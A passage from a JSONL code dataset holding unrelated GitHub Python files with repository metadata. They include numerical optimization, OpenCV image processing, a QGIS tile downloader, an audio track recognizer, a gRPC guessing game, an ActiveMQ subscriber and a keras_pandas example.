KDE.fit(self.Positions[-1, :][:, np.newaxis])\n if draws is None:\n draws = self.Positions.shape[1]\n return KDE.sample(draws)\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n# InitialConditions = np.array([(x, y) for x in range(-2, 3) for y in range(-2, 3)])\n InitialConditions = np.array([(np.sin(x), np.cos(x)) for x in 2 * np.pi * np.linspace(0, 0.99, 100)])\n TimeRange = [0, 5]\n TimeOut = 100\n ObjFunc = lambda x: x[0] ** 2 + x[1] ** 2\n DObjFunc = lambda x: np.array((2 * x[0], 2 * x[1]))\n DDObjFunc = lambda x: np.array([[2, 0], [0, 2]])\n methods = ['Gradient', 'Davidenko', 'Nesterov']\n fig, ax = plt.subplots(1, 3, figsize=(12, 4))\n for i in range(3):\n optimization = OptimizationSolver(InitialConditions, TimeRange, TimeOut, ObjFunc, DObjFunc, DDObjFunc, Algorithm=methods[i])\n optimization.Simulate()\n for j in range(InitialConditions.shape[0]):\n ax[i].scatter(optimization.Positions[j, :, :][0, :], optimization.Positions[j, :, :][1, :])\n ax[i].set_title(methods[i])\n ax[i].set_xlabel('Time')\n ax[i].set_xlabel('Position')\n plt.tight_layout()\n","repo_name":"TThiem/algorithms","sub_path":"src/OptimizationSolver.py","file_name":"OptimizationSolver.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40813322831","text":"# 导入工具包\nimport numpy as np\nimport cv2\ndef resize(image, width=None, height=None, inter=cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n resized = cv2.resize(image, dim, interpolation=inter)\n return resized\n\n\nimage = cv2.imread('example/1.png')\n#坐标也会相同变化\nratio = image.shape[0] / 500.0\norig = image.copy()\nimage = resize(orig, height = 500)\n\n# 预处理\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n# 输入图像必须是float32, 最后一个参数[0.04,0.06]\ndst = cv2.cornerHarris(gray, 2, 3, 0.1)\ncv2.imshow('dst', dst)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''\ngray = cv2.GaussianBlur(gray, (3, 3), 0) # 高斯滤波\n# 使用Sobel算子\nedged = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n# edged = cv2.threshold(edged, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n# 
展示预处理结果\nprint(\"STEP 1: 边缘检测\")\ncv2.imshow(\"Image\", image)\ncv2.imshow(\"Edged\", edged)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\ncnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]\ncnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n# 遍历轮廓\nfor c in cnts:\n # 计算轮廓近似\n peri = cv2.arcLength(c, True)\n # c表示输入的点集\n # epsilon表示从原始轮廓到近似轮廓的最大距离,它是一个准确度参数\n # True表示封闭的\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n # 4个点的时候就拿出来\n if len(approx) == 4:\n screenCnt = approx\n break\n# 展示结果\nprint(\"STEP 2: 获取轮廓\")\ncv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\ncv2.imshow(\"Outline\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''","repo_name":"DeepDream1128/MailingSheet","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24143508555","text":"#!/usr/bin/python\n#' Requiements:\n#' \n#' 1. Python 2.7 or greater\n#' 2. Packages:\n#' 'Python'\n#' numpy (>=1.8.2)\n#' scipy (>=0.13.3)\n#' scikit-learn (>=0.20)\n#' imbalanced-learn (0.4)\n#' pip install -U numpy\n#' pip install -U scipy\n#' pip install -U scikit-learn\n#' pip install -U imbalanced-learn\n#' pip install -U sklearn\n#'\n#' Please cite our paper if our paper or code helped you.\n#'\n\n###################################\n\n\nimport os\nimport re\nimport sys\n\n\nmarkerL=open(sys.argv[1],'r')#marker list, which used in train_MarkerCheck.R \ncellType=open(sys.argv[2],'r')#cell type list\nnormTrEx1=open(sys.argv[3],'r')#normalized scRNA-Seq from train_MarkerCheck.R\nnormTrEx2=open(sys.argv[3],'r')#normalized scRNA-Seq from train_MarkerCheck.R\ntrainD=open(sys.argv[4],'w')#ouput of training data\n\n\nmkl=[]\nmkls={}\n\n\nfor line in markerL:\n line=line.strip()\n line=line.split()\n for n in range(0,int(len(line))):\n mkl.append('\"'+line[n]+'\"')\n mkls['\"'+line[n]+'\"']='\"'+line[n]+'\"'\n\n#extract cell type information\n\ncellT={}\nfor line in cellType:\n line=line.strip()\n line=line.split()\n cellT[line[0]]=line[1]\n\n#get normalization value\nnte=[]#normalization value\n\nfor line in normTrEx1:\n line=line.strip()\n lineE=line.split()\n a=0\n if '\"' in lineE[1]:\n for n in range(0,int(len(lineE))):\n a=a+1\n if lineE[n] in mkls:\n nte.append(a)\n\n\n#getting the expression of markers genes\ncellID=''\nexp=''\n\nfor line in normTrEx2:\n line=line.strip()\n lineE=line.split()\n if '\"' in lineE[1]:\n for id in range(0,int(len(lineE))):\n if lineE[id] in mkls.keys():\n cellID=cellID+lineE[id]+' '\n print >>trainD,cellID+' '+'\"Cell_types\"'\n cellID\n\n if '\"' not in lineE[1]:\n \n for value in nte:\n #print value,len(lineE)\n exp=exp+lineE[int(value)]+' '\n if lineE[0] in cellT.keys():\n print >>trainD,lineE[0]+' '+exp+' '+cellT[lineE[0]]\n exp=''\n if lineE[0] not in cellT.keys():\n exp=''\n\nmarkerL.close()\nnormTrEx1.close()\nnormTrEx2.close()\ntrainD.close()\n\n","repo_name":"linwang6/ELSA","sub_path":"python/resources/train_prep.py","file_name":"train_prep.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39882052978","text":"import unittest\nimport pqkmeans\nimport numpy\nimport pipe\n\n\nclass TestPQEncoder(unittest.TestCase):\n def data_source(self, n: int):\n for i in range(n):\n for _ in range(3):\n yield [i * 100] * 6\n\n def setUp(self):\n self.encoder = pqkmeans.encoder.PQEncoder(num_subdim=2)\n\n def 
test_just_train_array(self):\n input_array = numpy.random.random((300, 10))\n self.encoder.fit(numpy.array(input_array))\n encoded = list(self.encoder.transform(numpy.array(input_array)))\n self.assertEqual(len(input_array), len(encoded))\n\n def test_fit_and_transform_generator(self):\n self.encoder.fit(numpy.array(list(self.data_source(300))))\n\n # infinite list\n encoded = self.encoder.transform_generator(self.data_source(100000000)) | pipe.take(60) | pipe.as_list\n\n for i in range(0, len(encoded), 3):\n numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 1])\n numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 2])\n\n def test_transform_and_inverse_transform(self):\n input_array = numpy.random.random((300, 10))\n self.encoder.fit(numpy.array(input_array))\n encoded = self.encoder.transform(numpy.array(input_array))\n decoded = self.encoder.inverse_transform(encoded)\n\n N1, M = encoded.shape\n N2, D = decoded.shape\n self.assertEqual(N1, N2)\n self.assertEqual(M, self.encoder.M)\n self.assertEqual(D, self.encoder.Ds * self.encoder.M)\n self.assertEqual(encoded.dtype, self.encoder.code_dtype)\n","repo_name":"DwangoMediaVillage/pqkmeans","sub_path":"test/encoder/test_pq_encoder.py","file_name":"test_pq_encoder.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"99"} +{"seq_id":"7511529099","text":"'''\nCreated on Jan 9, 2016\n\n@author: dewey\n'''\n\nimport os\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nimport qosmsettings\nimport tilemanagement as tm\nimport openstreetmap as osm\nimport downloaderthread as downloader\nfrom qosmlogging import log\n\nfrom ui_qosm_cachetiles_dialog import Ui_qosmDialogCacheTiles\n\nclass DialogCachetiles(QDialog, Ui_qosmDialogCacheTiles):\n \n def __init__(self, parent, iface):\n \"\"\"Constructor.\"\"\"\n super(DialogCachetiles, self).__init__(parent)\n self.setupUi(self)\n self.extent = None\n self.tiletype = None\n self.iface = iface\n self.thread = None\n self.errors = []\n \n self.maxZoom.valueChanged[\"int\"].connect(self.recalculate)\n self.minZoom.valueChanged[\"int\"].connect(self.recalculate)\n \n self.button_box.accepted.connect(self.do_download)\n self.button_box.rejected.connect(self.reject)\n \n def set_extent(self):\n extent = self.iface.mapCanvas().extent()\n crs = self.iface.mapCanvas().mapRenderer().destinationCrs()\n self.extent = osm.unproject(extent, crs)\n \n def set_tiletype(self, tiletype):\n self.tiletype = tiletype\n self.statusText.setText(\"Ready to download.\")\n self.set_progress(0, 100, False)\n self.doOverwrite.setChecked(False)\n \n def autoset_minmax(self):\n\n extll = self.extent\n \n minzoom = 1\n while len(tiles(extll, minzoom)) == 1:\n minzoom += 1\n \n maxzoom = minzoom + 1\n while (maxzoom <= 21) and len(tiles(extll, minzoom, maxzoom)) < 350: #about 10 mb\n maxzoom += 1\n \n self.minZoom.setValue(minzoom)\n self.maxZoom.setValue(maxzoom)\n self.recalculate()\n \n def recalculate(self, arg=None):\n minzoom = self.minZoom.value()\n maxzoom = self.maxZoom.value()\n if maxzoom < minzoom:\n self.maxZoom.setValue(minzoom)\n maxzoom = minzoom\n if minzoom > maxzoom:\n self.minZoom.setValue(maxzoom)\n minzoom = maxzoom\n \n numtiles = len(tiles(self.extent, minzoom, maxzoom))\n mb = 0.015 * numtiles #approximating heavily\n tiletext = \"tile\" if numtiles == 1 else \"tiles\"\n self.numtilestext.setText(\"%s %s (%0.2f MiB)\" % (numtiles, tiletext, mb))\n \n def do_download(self):\n if not 
self.thread is None: #don't start another thread if is already downloading\n return\n self.gridLayout.setEnabled(False)\n self.button_box.button(QDialogButtonBox.Ok).setEnabled(False)\n \n minzoom = self.minZoom.value()\n maxzoom = self.maxZoom.value()\n tilelist = tiles(self.extent, minzoom, maxzoom)\n \n self.thread = DownloaderThread(self, self.tiletype, tilelist, self.doOverwrite.isChecked())\n self.thread.finished.connect(self.download_finished)\n self.thread.progress.connect(self.set_progress)\n self.thread.error.connect(self.add_error)\n self.rejected.connect(self.thread.cancel)\n \n log(\"Starting thread\")\n self.thread.start()\n \n @pyqtSlot(int, int)\n def set_progress(self, progress, maximum, updatetext=True):\n self.progressBar.setMaximum(maximum)\n self.progressBar.setValue(progress)\n if updatetext:\n self.statusText.setText(\"Downloading %s of %s tiles%s\" % (progress,\n maximum, \n self.errortext()))\n \n @pyqtSlot(unicode)\n def add_error(self, message):\n self.errors.append(message)\n stext = unicode(self.statusText.text())\n nl = stext.find(\"\\n\")\n firstline = stext[:nl+1] if nl != -1 else stext\n self.statusText.setText(\"%s%s\" % (firstline, self.errortext())) \n \n def errortext(self):\n if self.errors:\n out = \"\\n%s error(s):\\n\" % len(self.errors)\n numerrors = min(10, len(self.errors))\n errorstrings = [self.errors[i] for i in range(len(self.errors)-numerrors, len(self.errors))]\n out += \"\\n\".join(errorstrings)\n return out\n else:\n return \"\"\n \n def download_finished(self):\n log(\"Thread finished\")\n self.thread.finished.disconnect(self.download_finished)\n self.thread.progress.disconnect(self.set_progress)\n self.thread.error.disconnect(self.add_error)\n self.rejected.disconnect(self.thread.cancel)\n \n self.gridLayout.setEnabled(True)\n self.button_box.button(QDialogButtonBox.Ok).setEnabled(True)\n haderrors = len(self.errors) != 0\n self.errors = []\n \n self.thread = None\n \n if not haderrors:\n self.statusText.setText(\"Download complete.\")\n\n\nclass DownloaderThread(QThread):\n \n progress = pyqtSignal(int, int)\n error = pyqtSignal(unicode)\n \n def __init__(self, parent, tiletype, tilelist, overwrite):\n super(DownloaderThread, self).__init__(parent)\n self.tiletype = tiletype\n self.tilelist = tilelist\n self.overwrite = overwrite\n self.cancelled = False\n \n def isCancelled(self):\n return self.cancelled\n \n @pyqtSlot()\n def cancel(self):\n self.cancelled = True\n \n def run(self):\n log(\"ensuring %s tiles are downloaded\" % len(self.tilelist))\n cachedir = qosmsettings.get(qosmsettings.CACHE_DIRECTORY)\n tilefiles = [tm.filename(cachedir, self.tiletype, tile[0:2], tile[2]) for tile in self.tilelist]\n tileurls = [tm.tileurl(self.tiletype, tile[0:2], tile[2]) for tile in self.tilelist]\n \n if not self.overwrite:\n #remove existing files\n indicies = []\n for i in range(len(tilefiles)):\n if os.path.exists(tilefiles[i]):\n indicies.append(i)\n log(\"removing %s tiles that already exist\" % len(indicies))\n for i in reversed(indicies):\n tilefiles.pop(i)\n tileurls.pop(i)\n \n downloader.download(tileurls, tilefiles, self.overwrite, errorhandler=self.emiterror, progresshandler=self.emitprogress,\n cancelledcallback=self.isCancelled)\n \n def emitprogress(self, value, maximum):\n self.progress.emit(value, maximum)\n \n def emiterror(self, message):\n self.error.emit(message)\n\ndef tiles(extll, minzoom, maxzoom=None):\n if maxzoom is None:\n maxzoom = minzoom\n alltiles = []\n for zoom in range(minzoom, maxzoom+1):\n alltiles = 
alltiles + osm.tiles(extll.xMinimum(), extll.xMaximum(), \n extll.yMinimum(), extll.yMaximum(), zoom)\n return alltiles","repo_name":"paleolimbot/qosm","sub_path":"qosmpy/dialog_cachetiles.py","file_name":"dialog_cachetiles.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"1707558170","text":"import pandas as pd\nfrom ShazamAPI import Shazam\nimport youtube_dl\nimport os\nfrom pydub import AudioSegment\nimport io\nfrom multiprocessing import Pool\n\ndef get_tracklist_of_url(url, output_path):\n '''\n main function\n '''\n title = url.split('/')[-2] + '_' + url.split('/')[-1]\n whole_audio_to_file(url, output_path) #download and save audio\n audio = AudioSegment.from_file(f'{output_path}complete/{title}.mp3', format='mp3') #load audio\n chunks = chunking(audio)\n tracks = get_tracks(chunks)\n df = tracks_to_df(tracks)\n return df\n \ndef tracks_to_df(tracks):\n df = pd.DataFrame(tracks)\n df = df.dropna()\n df = df.drop_duplicates()\n df['artist'] = df[0].apply(lambda x: x[0]).copy()\n df['track'] = df[0].apply(lambda x: x[1]).copy()\n df = df.drop(columns=[0])\n df = df.drop_duplicates().rename(columns = {0:'artist', 1:'track'})\n return df\n\ndef get_tracks(chunks):\n tracks = []\n with Pool() as pool:\n # call the same function with different data in parallel\n for result in pool.map(get_artist_title, chunks):\n # report the value to show progress\n tracks.append(result)\n return tracks\n \ndef chunking(audio):\n chunks = []\n chunk_length_ms = 30*1000 # 30-second chunks\n delay = 4 *60*1000 # every 2 minutes\n count = 40*1000 # starting at 40 seconds\n\n while True:\n start_time = count\n end_time = count + chunk_length_ms\n\n # Extract the desired chunk from the audio\n audio_chunk = audio[start_time:end_time]\n\n # Export the audio chunk as an MP3 file to a BytesIO object\n audio_file = io.BytesIO()\n audio_chunk.export(audio_file, format='mp3')\n\n # Read the audio data from the BytesIO object\n audio_data = audio_file.getvalue()\n\n # Add the audio data to the list\n chunks.append(audio_data)\n\n count = count + chunk_length_ms + delay\n if count + chunk_length_ms > len(audio):\n break \n return chunks\n \ndef whole_audio_to_file(url, output_path):\n title = url.split('/')[-2] + '_' + url.split('/')[-1]\n options = {\n 'format': 'best',\n 'outtmpl': f'{output_path}complete/{title}.mp3', # Output filename template\n }\n with youtube_dl.YoutubeDL(options) as ydl:\n ydl.download([url])\n print('downloaded')\n\ndef get_artist_title(file):\n '''\n returns artist,track\n '''\n shazam = Shazam(file)\n recognize_generator = shazam.recognizeSong()\n \n # Set the desired number of songs to recognize\n num_songs_to_recognize = 1\n songs_recognized = 0\n \n while songs_recognized < num_songs_to_recognize:\n try:\n song_info = next(recognize_generator)\n #print(song_info)\n songs_recognized += 1\n return song_info[1]['track']['subtitle'], song_info[1]['track']['title']\n except (StopIteration, KeyError):\n break","repo_name":"Buggy0815/djset-track-recognizer","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27142433553","text":"\"\"\"\nCreated on Tue Feb 11 13:38:57 2020\n\n@author: Ronan Murphy 15397831; Conor Melody 15403058\nAssignment 1: Data Engineering for Distributed MicroService Pipeline \n\n\"\"\"\nimport stomp\nimport pandas as 
pd\nimport csv\nimport json\nfrom datetime import datetime\nimport time\n\n#set EXIT message to False, test to tell when to disconnect from Activemq\nEXIT = False\n#initalise host and port\nconn = stomp.Connection(host_and_ports=[('localhost', '61613')])\n\n#same publish method as in previous script sends message to assigned queue\ndef publish(conn, msg, destination):\n conn.send(body=msg, destination=destination)\n \ndef main():\n #this method reads in the sorted crash data for the month of January \n with open(\"Filtered_CrashData_v3.csv\", 'r') as readFile:\n csv_reader = csv.reader(readFile)\n next(csv_reader) #This removes the row containing the column titles\n JanuaryCrash_DateLoc_data = []\n #iterate through rows in CSV and convert time to Date-Time object\n for row in csv_reader:\n DateTime_Obj = datetime.strptime(row[1], '%Y-%m-%d %H:%M:%S')\n Crash_DateLoc = [DateTime_Obj.day, DateTime_Obj.hour , row[2]]\n JanuaryCrash_DateLoc_data.append(Crash_DateLoc)\n \n #add day, time and location to pandas dateframe\n Crashdf = pd.DataFrame(JanuaryCrash_DateLoc_data ,columns=['Crash_Day', 'Crash_Time', 'CrashLocation'])\n\n\n i = 1 #Initial day Value\n j = 0 #Initial hour Value\n\n #convert the values in the datafrane to a list \n crashes_list = Crashdf.values.tolist()\n #keep index to decide when to close last window\n currentindex = 0\n length = len(crashes_list) #Total number of crashes over 5 days\n everycrashincident = []\n #enter dictionary for boroughs assigning counts to zero\n crashes_dict = {'BROOKLYN' :0, 'QUEENS':0, 'STATEN ISLAND':0, 'MANHATTAN':0, 'BRONX':0}\n \n #iterate through crashes \n for crash in crashes_list:\n #if the crash is in current day and hour increment count for location\n if crash[0] == i and crash[1] == j:\n crashes_dict[crash[2]] = crashes_dict.get(crash[2], 0) + 1\n currentindex += 1\n\n #if next hour output this list and count of crashes in each Borough\n if crash[0] == i and crash[1] != j:\n \n currentindex+=1\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j])\n \n \n everycrashincident.append(crashes_dictASLIST)\n crashes_dict = {'BROOKLYN' :0, 'QUEENS':0, 'STATEN ISLAND':0, 'MANHATTAN':0, 'BRONX':0}\n crashes_dict[crash[2]] = crashes_dict.get(crash[2], 0) + 1\n \n j = crash[1] #Reset the hour to the current crash hour\n \n #if there is a new day output the daily window for the crashes \n if crash[0] != i:\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j]) #This is the last hour of each day\n everycrashincident.append(crashes_dictASLIST)\n \n \n \n i = crash[0]\n j = 0\n \n currentindex+=1\n \n #for the last window output daily and hourly windows\n if currentindex == length:\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j])\n everycrashincident.append(crashes_dictASLIST)\n #call global dataframe and add the data to each row, columns are Boroughs\n global df\n df = pd.DataFrame(everycrashincident, columns =[\"BROOKLYN\", \"QUEENS\", \"STATEN ISLAND\", \"MANHATTAN\", \"BRONX\", \"Day\", \"Hour\"])\n \n \n #assign listner if any messaage is received dequeue this message\n conn.set_listener('', MyListener())\n conn.connect(login='system', passcode='manager', wait=True)\n #subscribes to previous queue\n conn.subscribe(destination='/queue/test4', id=4, ack='auto')\n \n #wait if incase a message is slow to send \n while not EXIT:\n time.sleep(60)\n \n #disconnect from queue\n conn.disconnect()\n\n \nclass MyListener(stomp.ConnectionListener):\n def 
_init_(self,conn, df):\n self.df = df\n \n def on_error(self, headers, message):\n print('received an error \"%s\"' % message)\n\n def on_message(self, headers, message):\n \n mess = eval(message)\n print(mess)\n if mess[0]== \"Daily Window\":\n day = mess[1] #Selecting day element from tumbling window output\n hour = mess[2] #Selecting hour element from tumbling window output\n \n #get crashes in peak hour \n \n \n row_index = ((df[(df['Day'] == day) & (df['Hour'] == hour)].index))[0] #Need [0] here to access necessary element of object\n #print(\"row_index\", row_index)\n df1 = df.loc[[row_index]] #This row is now a sub -DataFrame\n list3 = df1.values.tolist() # Converting row values to a list within a list\n\n \n l3 = []\n for element in list3: #This for loop extracts the one list from within the larger list\n for x in element:\n l3.append(x)\n\n\n del l3[-1] # Removes the Hour\n del l3[-1] #Removes the day\n crashes_forthishour = []\n for element in l3:\n crashes_forthishour.append(element[1])\n \n total_crashesinhour = sum(crashes_forthishour) #Total sum of crashes for this hour\n mess.extend([total_crashesinhour])\n else:\n day = mess[0] #Selecting day element from tumbling window output\n hour = mess[1] #Selecting hour element from tumbling window output\n loc = mess[3] #Selecting location element from tumbling window output\n \n \n row_index = (df[(df['Day'] == day) & (df['Hour'] == hour)].index)[0] #Need [0] here to access necessary element of object\n column_index = df.columns.get_loc(loc)\n numberofcrashes = (df.iloc[row_index, column_index][1])\n s = \"Number of crashes in this hour at this location = {}\".format(numberofcrashes)\n mess.extend([s])\n jsonData = json.dumps(mess, default = str)\n publish(conn, jsonData, '/queue/test5')\n \n \n if 'exit' in message:\n \n global EXIT\n EXIT = True\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"ronanmmurphy/NYC-Real-Time-Taxi-Feedback","sub_path":"src/Scripts/subscriber4.py","file_name":"subscriber4.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21587742237","text":"import streamlit as st\n\nfrom collections import defaultdict\nimport boto3\n\nimport pandas as pd\n\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\nload_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY = os.getenv(\"AWS_ACCESS_KEY\")\nAWS_SECRET_ACCESS_KEY = os.getenv(\"AWS_SECRET_ACCESS_KEY\")\n\nclient = boto3.client('s3', region_name='eu-west-3', aws_access_key_id=AWS_ACCESS_KEY, aws_secret_access_key=AWS_SECRET_ACCESS_KEY, config=boto3.session.Config(signature_version='s3v4'))\ns3 = boto3.resource('s3', aws_access_key_id=AWS_ACCESS_KEY, aws_secret_access_key=AWS_SECRET_ACCESS_KEY,)\nbucket = s3.Bucket(\"soundx-audio-dataset\")\n\n@st.cache_data(ttl=600)\ndef load_data():\n files = defaultdict(list)\n for obj in bucket.objects.all():\n if obj.key.endswith('.wav'):\n label, file = obj.key.split('/')[0], obj.key.split('/')[1]\n files[label].append(file)\n return files\n\n\nfiles = load_data()\n\nsummary = pd.DataFrame()\nfor label in files.keys():\n if label.startswith('AAAAA'):\n continue\n num_files = len(files[label])\n clean_files = len([file for file in files[label] if file.startswith('CLEAN')])\n df = pd.DataFrame({'label': label, 'num_files': num_files, 'clean_files': clean_files, 'raw_files': num_files - clean_files}, index=[0])\n # st.write(df)\n summary = pd.concat([summary, df], axis=0)\n\nsummary = 
summary.sort_values(by=['num_files'])\nst.dataframe(summary)","repo_name":"julienroulle/soundx","sub_path":"pages/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16194028647","text":"from time import sleep\nfrom machine import Pin\n\npinMap = (16, 5, 4, 0, 2, 14, 12, 13, 15, 3)\noutputs = [Pin(gpio, Pin.OUT) for gpio in pinMap[:8]]\n\nbackground = outputs[1:3]\nletters = outputs[3:5]\n\ndef show_code(name='main.py'):\n\twith open(name) as f:\n\t\tfor line in f.readlines():\n\t\t\tprint(line, end='')\n\ndef allOff():\n\tfor output in outputs:\n\t\toutput.low()\n\t\t\ndef allOn():\n\tfor output in outputs:\n\t\toutput.high()\n\ndef flashOne(index, delay=1):\n\toutputs[index].high()\n\tsleep(delay)\n\toutputs[index].low()\n\tsleep(delay)\n\ndef flashAll(delay=1):\n\tallOn()\n\tsleep(delay)\n\tallOff()\t\t\n\tsleep(delay)\n\ndef run():\n\tfor light in background:\n\t\tlight.high()\n\twhile True:\n\t\tfor light in letters:\n\t\t\tlight.low()\n\t\tsleep(1)\n\t\tletters[0].high()\n\t\tsleep(0.5)\n\t\tletters[1].high()\n\t\tsleep(0.5)\n\t\t\nrun()\n","repo_name":"ShrimpingIt/tableaux","sub_path":"regimes/02_bazinga/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33875866634","text":"from ast import While\nimport threading\nfrom urllib import response\nimport time\nimport grpc\nimport dica_pb2_grpc\nimport dica_pb2\n\nimport redis\n\nempty = dica_pb2.google_dot_protobuf_dot_empty__pb2.Empty()\n\n\nclass Client:\n def __init__(self, nome: str):\n self.nome = nome\n self.espera_jogador = ''\n channel = grpc.insecure_channel('localhost:50051')\n self.stub = dica_pb2_grpc.DicaServiceStub(channel)\n self.__entrar_jogo()\n self.__escutar_jogo()\n time.sleep(5)\n while True:\n self.__escutar_rodada()\n\n response = self.stub.ConfereFim(empty)\n # só finaliza ou continua depois de todos terem recebido o palpite\n if response.fim:\n print('Resposta correta!')\n break\n print('Não foi dessa vez...')\n time.sleep(2)\n self.__fim_jogo(response.ganhador1, response.ganhador2)\n\n def __escutar_jogo(self):\n palavra = ''\n print('Esperando Jogadores')\n response = self.stub.PartidaStream(empty)\n\n duplas = self.stub.MostrarJogadores(empty)\n print(f'As duplas são: ')\n print(f'Dupla 1: {duplas.jogador1} e {duplas.jogador3}')\n print(f'Dupla 2: {duplas.jogador2} e {duplas.jogador4}')\n\n if(response.nome == self.nome):\n palavra = str(\n input('É a sua vez de escolher a palavra!\\nPalavra: '))\n response_palavra = self.stub.EscolherPalavra(\n dica_pb2.Palavra(palavra=palavra))\n print(\n f'A palavra que você escolheu foi: {response_palavra.palavra}')\n else:\n print(f'{response.nome} está digitando a palavra!')\n self.__espera()\n\n def __escutar_rodada(self):\n\n response = self.stub.ConfereVez(empty)\n self.espera_jogador = response.nome\n\n print(f'{response.nome} quem dará a dica!')\n\n response_dica = dica_pb2.Dica(dica='')\n response_palpite = dica_pb2.PalpiteResposta(\n palpite='', acertou=False, recebeu=False)\n response_enviar_dica = dica_pb2.NomeJogadorResp(\n nome='', recebida=False)\n\n # TODO um loop para esperar nos outros clientes enquanto quem dá a dica n fornece\n if response.nome == self.nome:\n response_palavra = self.stub.VerPalavra(empty)\n print(f\"A palavra é: {response_palavra.palavra}\")\n dica = str(input('Forneça sua 
dica: '))\n response_enviar_dica = self.stub.DarDica(dica_pb2.Dica(dica=dica))\n self.espera_jogador = response_enviar_dica\n\n response_espera = self.stub.AlteraEspera(\n dica_pb2.Espera(espera=False))\n else:\n # TODO colocar um try except no loop enquanto a dica não é fornecida\n time.sleep(1)\n print(f'{response.nome} está digitando a dica!')\n self.__espera()\n\n response_dica = self.stub.VerDica(empty)\n self.stub.MensagemRecebida(empty)\n print(f\"{response.nome} deu a dica: {response_dica.dica}\")\n\n time.sleep(5)\n print(f'Quem dará o palpite é: {self.espera_jogador}!')\n\n if self.espera_jogador == self.nome:\n palpite = input(f'{self.nome}, digite seu palpite: ')\n self.stub.DarPalpite(\n dica_pb2.Palpite(palpite=palpite, jogador=self.nome))\n response_espera = self.stub.AlteraEspera(\n dica_pb2.Espera(espera=False))\n else:\n print(f'{self.espera_jogador} está digitando o palpite!')\n time.sleep(10)\n\n self.__espera()\n\n time.sleep(10)\n response_palpite = self.stub.VerPalpite(empty)\n self.stub.MensagemRecebida(empty)\n\n print(f'O palpite enviado foi {response_palpite.palpite}')\n\n def __entrar_jogo(self):\n response = self.stub.CriarJogador(\n dica_pb2.NomeJogador(nome=self.nome))\n # print(f'resp: {response}')\n\n def __espera(self):\n while True:\n\n response = self.stub.ConfereEspera(empty)\n\n self.espera_jogador = response.jogador\n\n if response.espera == False:\n break\n time.sleep(3)\n\n def __fim_jogo(self, ganhadorA, ganhadorB):\n r = redis.Redis(host='localhost', port=6379)\n r.set('ganhadores', ganhadorA + ' ' + 'e' + ' ' + ganhadorB)\n ganhadores = r.get('ganhadores')\n print((f'Parabéns! {ganhadores} ganharam o jogo!!!'))\n\n\nif __name__ == '__main__':\n nome_jogador = input('Digite seu nome: ')\n c = Client(nome_jogador)\n","repo_name":"fernandanlisboa/grpc-jogo-dica","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17039377282","text":"import logging\n\nfrom keras import Model\nfrom keras.layers import Dense\n\nfrom keras_pandas.Automater import Automater\nfrom keras_pandas.lib import load_titanic\n\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n\n observations = load_titanic()\n\n # Transform the data set, using keras_pandas\n categorical_vars = ['pclass', 'sex', 'survived']\n numerical_vars = ['age', 'siblings_spouses_aboard', 'parents_children_aboard', 'fare']\n text_vars = ['name']\n\n auto = Automater(categorical_vars=categorical_vars, numerical_vars=numerical_vars, text_vars=text_vars,\n response_var='survived')\n X, y = auto.fit_transform(observations)\n\n # Start model with provided input nub\n x = auto.input_nub\n\n # Fill in your own hidden layers\n x = Dense(32)(x)\n x = Dense(32, activation='relu')(x)\n x = Dense(32)(x)\n\n # End model with provided output nub\n x = auto.output_nub(x)\n\n model = Model(inputs=auto.input_layers, outputs=x)\n model.compile(optimizer='Adam', loss=auto.loss, metrics=['accuracy'])\n\n # Train model\n 